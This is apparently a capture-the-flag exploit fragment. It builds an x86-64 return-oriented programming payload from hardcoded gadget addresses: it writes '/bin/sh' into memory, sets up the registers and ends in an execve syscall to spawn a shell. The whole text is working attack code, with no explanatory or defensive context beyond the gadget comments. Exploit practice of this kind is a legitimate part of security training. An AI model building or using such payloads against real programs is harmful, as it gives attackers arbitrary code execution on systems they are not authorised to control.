payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x410fdc)
# 0x0000000000410fdc: xchg eax, ebp; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x17300ab0)+p64(0x40ec2b)
# 0x000000000040ec2b: or dword ptr [rbp - 0x16ec8a40], eax; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x410fdc)
# 0x0000000000410fdc: xchg eax, ebp; ret; 
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x17300ab4)+p64(0x40ec2b)
# 0x000000000040ec2b: or dword ptr [rbp - 0x16ec8a40], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x438070)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4381e0)+p64(0x410fdc)
# 0x0000000000410fdc: xchg eax, ebp; ret; 
payload += p64(0x41fb88)
# 0x000000000041fb88: pop rdx; and dword ptr [rax], eax; add al, 0xe9; ret 2; 
payload += p64(0x0)+p64(0x4017d1)+"\x00"*2
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x410fdc)
# 0x0000000000410fdc: xchg eax, ebp; ret; 
payload += p64(0x415ae0)
# 0x0000000000415ae0: syscall; 
payload += b''
